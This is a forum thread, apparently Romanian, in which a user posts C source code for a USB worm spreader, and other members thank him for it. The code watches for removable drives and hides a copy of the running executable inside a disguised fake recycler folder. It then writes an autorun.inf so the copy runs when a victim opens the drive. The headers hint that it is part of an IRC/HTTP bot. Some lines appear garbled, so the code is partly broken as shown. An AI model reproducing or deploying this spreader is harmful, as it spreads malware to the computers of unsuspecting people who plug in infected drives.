strike Posted June 9, 2010 Report Share Posted June 9, 2010 (edited) #include "includes.h"#include "externs.h"#define USBSLEEPTIME 20000#define USB_STR_RECYCLER "\\TTHDHGC"#define USB_STR_REC_SUBDIR "\\DFG-2352-66235-2352322-634621321-6662355"#define USB_STR_DESKTOP_DATA "[.ShellClassInfo]\r\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}"#define USB_STR_DESKTOP_INI "\\Desktop.ini"#define USB_STR_AUTORUN_INF "\\autorun.inf"#define USB_STR_AUTORUN_DATA1 "[autorun]\r\nopen="#define USB_STR_AUTORUN_DATA2 "\r\nicon=%SystemRoot%\\system32\\SHELL32.dll,4\r\naction=Open folder to view files \r\nshell\\open\\command="#define USB_STR_AUTORUN_DATA3 "\r\nshell\\open\\default=1"#define USB_STR_FILENAME "364855.exe"BOOL USB_InfectDrive(char *drv){ char szFile[514] = {0}, szTemp[514] = {0}, *p; //128 = IRCLINE? int i; BOOL ret; HANDLE f; DWORD d; // create RECYCLER lstrcat(szFile, drv); lstrcat(szFile, USB_STR_RECYCLER); if (!CreateDirectory(szFile, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) return FALSE; SetFileAttributes(szFile, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); lstrcat(szFile, USB_STR_REC_SUBDIR); if (!CreateDirectory(szFile, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) return FALSE; SetFileAttributes(szFile, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // create Desktop.ini lstrcat(szFile, USB_STR_DESKTOP_INI); f = CreateFile(szFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, 0); if (f < (HANDLE)1) return FALSE; if (!WriteFile(f, USB_STR_DESKTOP_DATA, sizeof(USB_STR_DESKTOP_DATA) - 1, &d, NULL)) { CloseHandle(f); return FALSE; } CloseHandle(f); // copy .exe file p = szFile + lstrlen(szFile); while (p[0] != '\\') p--; p++; *p = 0; lstrcat(szFile, USB_STR_FILENAME); GetModuleFileName(0, szTemp, sizeof(szTemp)-1); ret = CopyFile(szTemp, szFile, TRUE); // todo: add crc or md5 check for file SetFileAttributes(szFile, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // create autorun.inf data for (i = 0; i < sizeof(szTemp); i++) szTemp = 0; p = szFile; while (p[0] != '\\') p++; p++; lstrcat(szTemp, USB_STR_AUTORUN_DATA1); lstrcat(szTemp, p); lstrcat(szTemp, USB_STR_AUTORUN_DATA2); lstrcat(szTemp, p); lstrcat(szTemp, USB_STR_AUTORUN_DATA3); // create autorun.inf file for (i = 0; i < sizeof(szFile); i++) szFile = 0; lstrcat(szFile, drv); lstrcat(szFile, USB_STR_AUTORUN_INF); SetFileAttributes(szFile, FILE_ATTRIBUTE_NORMAL); f = CreateFile(szFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY, 0); if (f < (HANDLE)1) return FALSE; if (!WriteFile(f, szTemp, lstrlen(szTemp), &d, NULL)) { CloseHandle(f); return FALSE; } CloseHandle(f); return ret;}DWORD WINAPI USB_Spreader(LPVOID param){ NTHREAD *usbs = (NTHREAD *)param; char szTemp[514] = {0}; char szDrive[3]; char *p; szDrive[0] = ' '; szDrive[1] = ':'; szDrive[2] = 0; for ( { Sleep(USBSLEEPTIME); if (GetLogicalDriveStrings(514 - 1, szTemp)) { p = szTemp; do { *szDrive = *p; if (szDrive[0] != 65 && szDrive[0] != 66 && szDrive[0] != 97 && szDrive[0] != 98) { if (GetDriveType(szDrive) == DRIVE_REMOVABLE) { if (USB_InfectDrive(szDrive)) { } } } while (*p++); } while (*p); } }}externs.h:DWORD WINAPI USB_Spreader(LPVOID param);DWORD WINAPI view(LPVOID param);DWORD WINAPI cHTTP(LPVOID param);includes.h:#define _WIN32_WINNT 0x0403 // Very important for critical sections.#define WIN32_LEAN_AND_MEAN // Good to use.#pragma optimize("gsy", on) // Global optimization, Short sequences, Frame pointers.#pragma comment(linker, "/opt:nowin98")#pragma comment(linker, "/ALIGN:4096") // This will save you some size on the executable.#pragma comment(linker, "/IGNORE:4108 ") // This is only here for when you use /ALIGN:4096.//default headers#include <windows.h>#include <stdio.h>#include <string.h>#include <winsock2.h>#include <time.h>#include <stdlib.h>#include <Winsvc.h>#include <winuser.h> #include <wininet.h>#include <winable.h> #include <tlhelp32.h>#include <tchar.h>#include <shlobj.h>#include <shlwapi.h>#include <shellapi.h>#include <tlhelp32.h>#pragma comment(lib, "Ws2_32.lib") #pragma comment(lib, "shlwapi.lib")#pragma comment(lib, "urlmon.lib")#pragma comment(lib, "shell32.lib")Sursa de inspiratie. Edited June 9, 2010 by strike Quote Link to comment Share on other sites More sharing options...
Ellimist Posted June 9, 2010 Report Share Posted June 9, 2010 Asa...Merci. Usefull Quote Link to comment Share on other sites More sharing options...
strike Posted June 9, 2010 Author Report Share Posted June 9, 2010 Am editat:) Quote Link to comment Share on other sites More sharing options...